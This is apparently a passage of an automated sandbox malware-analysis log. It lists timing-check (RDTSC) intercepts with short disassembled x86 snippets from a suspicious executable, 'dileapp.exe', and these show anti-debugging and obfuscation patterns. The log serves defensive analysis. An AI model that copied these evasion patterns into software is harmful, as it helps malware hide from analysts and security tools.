                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F196F second address: 11F19DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FCCB120DFE6h 0x0000000e add ebx, dword ptr [ebp+13762A38h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FCCB120DFD8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+13762A28h] 0x00000036 js 00007FCCB120DFDEh 0x0000003c jno 00007FCCB120DFD8h 0x00000042 push 00000000h 0x00000044 mov dword ptr [ebp+137637D4h], esi 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jc 00007FCCB120DFD8h 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F19DA second address: 11F19E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F1B5E second address: 11F1B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F2C03 second address: 11F2C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F4909 second address: 11F490E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A999F second address: 11A99A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F708A second address: 11F708E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F4BAD second address: 11F4BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F4BB1 second address: 11F4BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F708E second address: 11F710F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FCCB0D02D0Ch 0x0000000d nop 0x0000000e movzx ebx, bx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FCCB0D02D08h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov dword ptr [ebp+137637CFh], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FCCB0D02D08h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov dword ptr [ebp+1376379Dh], ecx 0x00000055 xchg eax, esi 0x00000056 ja 00007FCCB0D02D17h 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push ebx 0x00000061 pop ebx 0x00000062 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F724E second address: 11F7253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F7253 second address: 11F72E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCCB0D02D08h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, dword ptr [ebp+138EDD63h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b cmc 0x0000003c mov eax, dword ptr [ebp+13760BC5h] 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FCCB0D02D08h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c jmp 00007FCCB0D02D18h 0x00000061 push FFFFFFFFh 0x00000063 sub dword ptr [ebp+137636B9h], edx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F72E8 second address: 11F72EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FD53E second address: 11FD548 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FD548 second address: 11FD54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FD54C second address: 11FD5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FCCB0D02D0Ch 0x0000000d nop 0x0000000e xor ebx, dword ptr [ebp+138F784Dh] 0x00000014 push 00000000h 0x00000016 jng 00007FCCB0D02D09h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCCB0D02D08h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007FCCB0D02D11h 0x0000003d push eax 0x0000003e pushad 0x0000003f push esi 0x00000040 ja 00007FCCB0D02D06h 0x00000046 pop esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FE501 second address: 11FE507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FB6E3 second address: 11FB6E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FB6E9 second address: 11FB6EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FF434 second address: 11FF438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FF438 second address: 11FF43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F8143 second address: 11F8175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D18h 0x00000008 jmp 00007FCCB0D02D0Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FF43C second address: 11FF442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F8175 second address: 11F8179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FF442 second address: 11FF447 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F8179 second address: 11F817D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FF447 second address: 11FF48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FCCB120DFD8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+13762430h] 0x0000002a push 00000000h 0x0000002c mov edi, dword ptr [ebp+13762E61h] 0x00000032 push 00000000h 0x00000034 mov ebx, eax 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F824B second address: 11F824F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F824F second address: 11F825C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12002CA second address: 12002CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12002CE second address: 12002D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 120053C second address: 1200542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1200542 second address: 1200546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 120A70F second address: 120A72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCCB0D02D16h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 120A72E second address: 120A732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 120A9F7 second address: 120AA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCCB0D02D0Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 120AB4F second address: 120AB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121091E second address: 1210925 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1210AEF second address: 1210B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1210B07 second address: 1210B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216C3E second address: 1216C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCCB120DFD6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216C50 second address: 1216C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D13h 0x00000009 popad 0x0000000a js 00007FCCB0D02D1Fh 0x00000010 jmp 00007FCCB0D02D13h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216C83 second address: 1216C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216C87 second address: 1216CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB0D02D16h 0x00000009 jmp 00007FCCB0D02D18h 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12159C5 second address: 12159D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007FCCB120DFD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12159D1 second address: 1215A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FCCB0D02D22h 0x0000000f js 00007FCCB0D02D0Ah 0x00000015 push esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007FCCB0D02D06h 0x00000021 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121651C second address: 1216520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12167B9 second address: 12167E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007FCCB0D02D06h 0x0000000b jmp 00007FCCB0D02D14h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FCCB0D02D06h 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216941 second address: 1216959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE4h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216959 second address: 1216965 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCCB0D02D06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1216965 second address: 1216984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FCCB120DFE9h 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1218338 second address: 121833C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121833C second address: 1218357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCCB120DFE9h 0x0000000c jmp 00007FCCB120DFDDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121DB39 second address: 121DB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121DB3D second address: 121DB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c je 00007FCCB120DFD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121C89E second address: 121C8A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121C8A2 second address: 121C8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCCB120DFD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CB30 second address: 121CB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CB35 second address: 121CB47 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCCB120DFD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CB47 second address: 121CB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CB4B second address: 121CB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CB54 second address: 121CB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Fh 0x00000009 jg 00007FCCB0D02D06h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CFD8 second address: 121CFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121CFDC second address: 121CFE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D29E second address: 121D2C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE2h 0x00000007 jng 00007FCCB120DFD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FCCB120DFD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D2C4 second address: 121D2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D43B second address: 121D44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FCCB120DFD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D44A second address: 121D453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D453 second address: 121D45D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D586 second address: 121D592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCCB0D02D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D592 second address: 121D5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FCCB120DFD6h 0x0000000c jmp 00007FCCB120DFE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 121D868 second address: 121D87F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 119AA42 second address: 119AA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 119AA46 second address: 119AA52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FCCB0D02D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 119AA52 second address: 119AA68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCCB120DFDFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1225846 second address: 122585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122585B second address: 1225871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB120DFDEh 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1226FCC second address: 1226FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCCB0D02D06h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCCB0D02D13h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122F6EB second address: 122F6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122E3F5 second address: 122E3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122E653 second address: 122E657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122E94C second address: 122E950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAAC second address: 122EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FCCB120DFD6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jnc 00007FCCB120DFD6h 0x0000001c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAD9 second address: 122EAEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCCB0D02D16h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAEC second address: 122EAF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EDAD second address: 122EDC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCCB0D02D06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EDC4 second address: 122EDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A1511 second address: 11A151B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB0D02D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
